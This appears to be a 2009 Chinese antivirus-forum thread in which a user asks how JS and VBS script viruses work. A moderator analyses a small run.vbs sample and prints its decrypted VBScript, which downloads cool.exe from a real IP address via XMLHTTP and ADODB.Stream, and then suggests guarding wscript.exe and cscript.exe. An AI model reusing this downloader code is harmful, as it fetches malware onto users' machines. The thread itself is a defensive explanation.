请问下JS脚本病毒和VBS脚本病毒是什么原理？ - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛请问下JS脚本病毒和VBS脚本病毒是什么原理？

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十六次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] 请问下JS脚本病毒和VBS脚本病毒是什么原理？

逍遥sun6 初生襁褓狮帖子:3 注册: 2009-05-14 来自:	发表于： 2009-05-14 20:53 \| 只看楼主短消息资料字号：小中大 1楼请问下JS脚本病毒和VBS脚本病毒是什么原理？小弟最近在研究JS和VBS 请问下JS脚本病毒和VBS脚本病毒是什么原理？有什么特征吗？谢谢高人解答用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
逍遥sun6 初生襁褓狮帖子:3 注册: 2009-05-14 来自:	分享到：

lrxyhrm 叱咤花甲狮帖子:3782 注册: 2008-08-14 来自:吉利	发表于： 2009-05-14 21:01 \| 短消息资料字号：小中大 2楼回复：请问下JS脚本病毒和VBS脚本病毒是什么原理？只知道编写语言不一样。
lrxyhrm 叱咤花甲狮帖子:3782 注册: 2008-08-14 来自:吉利

baohe 大版主帖子:72578 注册: 2003-04-10 来自:	发表于： 2009-05-14 21:32 \| 短消息资料字号：小中大 3楼回复: 请问下JS脚本病毒和VBS脚本病毒是什么原理？引用: 原帖由逍遥sun6 于 2009-5-14 20:53:00 发表小弟最近在研究JS和VBS 请问下JS脚本病毒和VBS脚本病毒是什么原理？有什么特征吗？谢谢高人解答用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CL...... 这个最简单的脚本病毒run.vbs，大小只有1k。运行后加载wscript.exe。 1.jpg (103.64 K) 2009-5-14 21:31:59 wscript.exe通过1386端口访问222.236.106.9，下载病毒。 2.jpg (35.38 K) 2009-5-14 21:31:59 如果手快，在病毒未开始下载之前就结束wscript.exe进程，就没事了。 3.jpg (43.61 K) 2009-5-14 21:31:59 解密后的脚本病毒内容为： set oshell = wscript.createobject (Wscript.shell) Set xPost = CreateObject(Microsoft.XMLHTTP) xPost.Open GET,http://222.236.106.9:81/cool.exe,0 xPost.Send() Set sGet = CreateObject(ADODB.Stream) sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) baohe 最后编辑于 2009-05-14 21:36:46
baohe 大版主帖子:72578 注册: 2003-04-10 来自:

逍遥sun6 初生襁褓狮帖子:3 注册: 2009-05-14 来自:	发表于： 2009-05-14 21:46 \| 只看楼主短消息资料字号：小中大 4楼回复：请问下JS脚本病毒和VBS脚本病毒是什么原理？额。那就是说一般run.vbs里面就是执行加载一个文件的这些此类信息咯？
逍遥sun6 初生襁褓狮帖子:3 注册: 2009-05-14 来自:

baohe 大版主帖子:72578 注册: 2003-04-10 来自:	发表于： 2009-05-14 21:49 \| 短消息资料字号：小中大 5楼回复: 请问下JS脚本病毒和VBS脚本病毒是什么原理？引用: 原帖由逍遥sun6 于 2009-5-14 21:46:00 发表额。那就是说一般run.vbs里面就是执行加载一个文件的这些此类信息咯？ .VBS运行需要wscript.exe或cscript.exe之类的系统程序。看护住这两个系统程序，脚本病毒基本没戏。
baohe 大版主帖子:72578 注册: 2003-04-10 来自:

逍遥sun6 初生襁褓狮帖子:3 注册: 2009-05-14 来自:	发表于： 2009-05-14 21:56 \| 只看楼主短消息资料字号：小中大 6楼回复：请问下JS脚本病毒和VBS脚本病毒是什么原理？哦，原来如此，哈，谢谢老大了，果然厉害啊。那像.VBS中一般会写些什么代码呢？哪些方面的？ JS和他原理一样么？
逍遥sun6 初生襁褓狮帖子:3 注册: 2009-05-14 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT